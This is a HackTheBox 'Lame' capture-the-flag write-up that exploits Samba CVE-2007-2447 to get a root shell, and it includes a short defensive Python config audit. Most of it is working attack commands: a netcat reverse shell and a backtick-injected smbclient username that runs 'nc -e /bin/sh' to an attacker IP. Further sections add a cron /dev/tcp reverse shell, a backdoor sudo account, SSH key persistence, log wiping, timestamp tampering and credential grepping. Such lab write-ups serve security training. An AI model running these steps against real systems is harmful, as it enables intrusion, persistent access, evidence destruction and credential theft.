HackTheBox Lame
Writeup for HackTheBox Lame
Machine Synopsis
Key Exploitation Techniques:
- Samba usermap script vulnerability (CVE-2007-2447)
- Remote code execution to immediate root access
- Alternative exploitation paths analysis
Reconnaissance & Enumeration
Port Discovery
```
$ nmap -p- --min-rate 10000 10.10.10.3
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
```
Service Enumeration
```
$ nmap -p 21,22,139,445 -sC -sV 10.10.10.3
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
```
Vulnerability Research
```
$ searchsploit vsftpd 2.3.4
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/17491.rb
$ searchsploit samba 3.0.20
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution | unix/remote/16320.rb
```
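As a defender-side check added to this writeup (not part of the original post or of any Samba tooling), the following Python audit flags the two conditions behind the searchsploit entry above: a Samba build inside the quoted 3.0.20 to 3.0.25rc3 range, and a `username map script` directive in smb.conf, which is the setting that lets an unauthenticated SMB username reach a shell. The smb.conf fragment and the script path in it are constructed sample data.

```python
import re
# Constructed smb.conf fragment (sample data; the script path is hypothetical). The
# "username map script" directive is what CVE-2007-2447 abuses, before any authentication.
SAMPLE_SMB_CONF = """[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   guest ok = yes
"""

def parse_smb_conf(text):
    """Parse INI-style smb.conf into {section: {key: value}} with lower-cased keys."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections

def version_key(version):
    """Sortable key: '3.0.25rc3' sorts before '3.0.25'; suffixes like '-Debian' are ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", version)
    if not m:
        raise ValueError(f"unrecognised Samba version: {version!r}")
    major, minor, patch, rc = m.groups()
    stage = (0, int(rc)) if rc else (1, 0)  # release candidates sort below the final build
    return (int(major), int(minor), int(patch)) + stage

# Affected range as quoted by the searchsploit entry: 3.0.20 up to (not including) 3.0.25rc3
AFFECTED = (version_key("3.0.20"), version_key("3.0.25rc3"))

def audit(conf_text, version):
    """Return findings for a host running `version` with the given smb.conf text."""
    glob = parse_smb_conf(conf_text).get("global", {})
    in_range = AFFECTED[0] <= version_key(version) < AFFECTED[1]
    script = glob.get("username map script")
    findings = [f"Samba {version} is in the CVE-2007-2447 affected range"] if in_range else []
    if script:
        findings.append(f"username map script is set: {script}")
    if in_range and script:
        findings.append("exploitable: unauthenticated SMB usernames reach a shell")
    return findings
```

Running `audit(SAMPLE_SMB_CONF, "3.0.20-Debian")` with the version string from the nmap output above returns all three findings; on a patched build only the directive is reported.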
Exploitation
Failed Attempt: vsftpd 2.3.4 Backdoor
```
$ msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
```
Successful Exploitation: Samba CVE-2007-2447
Manual Exploitation
```
# Download the exploit
$ wget https://raw.githubusercontent.com/amriunix/CVE-2007-2447/master/usermap_script.py
# Set up a netcat listener
$ nc -nlvp 1234
# Execute the exploit
$ python usermap_script.py 10.10.10.3 445 10.10.14.3 1234
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
```
Root Shell Access
```
$ nc -nlvp 1234
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.3] 34329
id
uid=0(root) gid=0(root)
cd /root
cat root.txt
1958f8c5ebfa347cc8dc6b7c35a3b132
cd /home/makis
cat user.txt
a848bb4bcd8a9651138d9cfa73d4d16e
```
Post-Exploitation Techniques
Persistence Methods
SSH Key Installation
```
# Generate an SSH key pair
$ ssh-keygen -t rsa -b 2048 -f lame_key
# Install the public key on the target
echo "ssh-rsa AAAAB3NzaC1yc2E..." >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chmod 700 /root/.ssh
# Test SSH access
$ ssh -i lame_key root@10.10.10.3
```
Backdoor User Account
```
# Create a backdoor user with root privileges
useradd -m -s /bin/bash -G sudo backup
echo 'backup:password123' | chpasswd
echo "backup ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
```
Cron Job Persistence
```
# Add a persistent reverse shell cron job
echo "*/5 * * * * root /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/4444 0>&1'" >> /etc/crontab
# Verify the entry (crontab -l only lists the per-user crontab, not /etc/crontab)
tail -n 1 /etc/crontab
```
Defense Evasion
Log Cleanup
```
# Clear system logs
echo > /var/log/auth.log
echo > /var/log/syslog
echo > /var/log/daemon.log
# Clear Samba logs
echo > /var/log/samba/log.smbd
echo > /var/log/samba/log.nmbd
# Clear bash history
history -c
echo > /root/.bash_history
unset HISTFILE
```
File Timestamp Manipulation
```
# Match timestamps to system files
touch -r /bin/bash /tmp/backdoor
touch -r /etc/passwd /root/.ssh/authorized_keys
```
Lateral Movement Preparation
Network Discovery
```
# Discover network hosts
nmap -sn 10.10.10.0/24
# Port scanning
nmap -sS -A 10.10.10.1-254
```
Credential Harvesting
```
# Search for stored credentials
grep -r "password" /etc/ 2>/dev/null | grep -v "Binary"
find /home -name "*.txt" -o -name "*.conf" -o -name "*.xml" | xargs grep -l "password" 2>/dev/null
# Check the Samba configuration
grep -E "(user|pass)" /etc/samba/smb.conf
```
Alternative Exploitation Methods
Metasploit Module
```
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.3
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Command shell session 1 opened
id
uid=0(root) gid=0(root)
```
Manual SMB Client Exploitation
```
# Connect using smbclient with a malicious username
$ smbclient //10.10.10.3/tmp
smb: \> logon "/=`nohup nc -e /bin/sh 10.10.14.3 1337`"
```
This post is licensed under CC BY 4.0 by the author.